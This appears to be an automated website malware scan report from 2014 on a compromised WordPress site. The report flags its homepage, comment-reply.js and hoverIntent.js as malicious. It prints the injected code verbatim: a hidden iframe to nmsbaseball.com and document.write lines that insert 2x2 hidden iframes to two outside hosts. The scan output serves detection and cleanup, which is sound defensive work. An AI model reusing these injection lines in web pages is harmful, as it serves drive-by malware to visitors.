Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mednewlife.ro
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.mednewlife.ro/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 31 May 2014 09:27:09 GMT Location: http://mednewlife.ro/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_a9f39833e04eb11770379e9d4ca5f243=%7C1402738030%7C6a2d82847e93e308510f7def812ab1ba; expires=Sat, 14-Jun-2014 09:27:10 GMT; path=/wp-content/plugins; httponly Set-Cookie: wordpress_a9f39833e04eb11770379e9d4ca5f243=%7C1402738030%7C6a2d82847e93e308510f7def812ab1ba; expires=Sat, 14-Jun-2014 09:27:10 GMT; path=/wp-admin; httponly Set-Cookie: wordpress_logged_in_a9f39833e04eb11770379e9d4ca5f243=%7C1402738030%7C25d87a6712ab5de1e632c6944b94da8f; expires=Sat, 14-Jun-2014 09:27:10 GMT; path=/; httponly X-Pingback: http://mednewlife.ro/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://mednewlife.ro/ | 200 OK Content-Length: 18952 Content-Type: text/html | malicious |
Page code contains blacklisted domain: nmsbaseball.com ...[21906 bytes skipped]... _wpcf7 = {"loaderUrl":"http:\/\/mednewlife.ro\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"\u00cen curs de trimitere..."}; /* ]]> */ </script> <script type='text/javascript' src='http://mednewlife.ro/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.1'></script> <iframe name=Twitter scrolling=auto frameborder=no align=center height=87 width=84 src=http://nmsbaseball.com/post.php?id=918057></iframe></body> </html> Malicious iFrame found. size: 84x87 src: http://nmsbaseball.com/post.php?id=918057 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=87 width=84 src=http://nmsbaseball.com/post.php?id=918057> | ||
http://mednewlife.ro/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/javascript | clean |
http://mednewlife.ro/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.4.2 | 200 OK Content-Length: 379 Content-Type: application/javascript | clean |
http://mednewlife.ro/wp-includes/js/comment-reply.js?ver=3.4.2 | 200 OK Content-Length: 1122 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=3298001></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3298001></iframe>'); addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_pare Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gradneyvistica.com/cwzf.html?j=3298001 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3298001> Hidden iFrame found. size: 2x2 src: http://schiedsrichterge.bplaced.net/acwf.html?j=3298001 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=3298001> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.3/jquery-ui.min.js | 200 OK Content-Length: 183557 Content-Type: text/javascript | clean |
http://storage.trafic.ro/js/trafic.js | 200 OK Content-Length: 204 Content-Type: application/x-javascript | clean |
http://mednewlife.ro/wp-includes/js/hoverIntent.js?ver=r6 | 200 OK Content-Length: 1332 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=3298001></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3298001></iframe>'); (function(a){a.fn.hoverIntent=function(k,j){var l={sensitivity:7,interval:100,timeout:0};l=a.extend(l,j?{over:k,out:j}:k);va Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gradneyvistica.com/cwzf.html?j=3298001 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3298001> Hidden iFrame found. size: 2x2 src: http://schiedsrichterge.bplaced.net/acwf.html?j=3298001 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=3298001> | ||
http://mednewlife.ro/wp-content/plugins/lightbox-plus/js/jquery.colorbox-min.js?ver=1.3.17.2 | 200 OK Content-Length: 9514 Content-Type: application/javascript | clean |
http://mednewlife.ro/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.18 | 200 OK Content-Length: 15021 Content-Type: application/javascript | clean |
http://mednewlife.ro/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.1 | 200 OK Content-Length: 6859 Content-Type: application/javascript | clean |
http://www.mednewlife.ro/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mednewlife.ro
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 31 May 2014 09:27:10 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_a9f39833e04eb11770379e9d4ca5f243=%7C1402738031%7C082abcecd596407ce1ff6053b7830ae1; expires=Sat, 14-Jun-2014 09:27:11 GMT; path=/wp-content/plugins; httponly
Set-Cookie: wordpress_a9f39833e04eb11770379e9d4ca5f243=%7C1402738031%7C082abcecd596407ce1ff6053b7830ae1; expires=Sat, 14-Jun-2014 09:27:11 GMT; path=/wp-admin; httponly
Set-Cookie: wordpress_logged_in_a9f39833e04eb11770379e9d4ca5f243=%7C1402738031%7C0bec8e3806f8e141e427e6dc05741231; expires=Sat, 14-Jun-2014 09:27:11 GMT; path=/; httponly
X-Pingback: http://mednewlife.ro/xmlrpc.php
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: mednewlife.ro
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 31 May 2014 09:27:10 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_a9f39833e04eb11770379e9d4ca5f243=%7C1402738031%7C082abcecd596407ce1ff6053b7830ae1; expires=Sat, 14-Jun-2014 09:27:11 GMT; path=/wp-content/plugins; httponly
Set-Cookie: wordpress_a9f39833e04eb11770379e9d4ca5f243=%7C1402738031%7C082abcecd596407ce1ff6053b7830ae1; expires=Sat, 14-Jun-2014 09:27:11 GMT; path=/wp-admin; httponly
Set-Cookie: wordpress_logged_in_a9f39833e04eb11770379e9d4ca5f243=%7C1402738031%7C0bec8e3806f8e141e427e6dc05741231; expires=Sat, 14-Jun-2014 09:27:11 GMT; path=/; httponly
X-Pingback: http://mednewlife.ro/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: mednewlife.ro
Referer: http://www.google.com/search?q=mednewlife.ro
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mednewlife.ro
Referer: http://www.google.com/search?q=mednewlife.ro
Result:
The result is similar to the first query. There are no suspicious redirects found.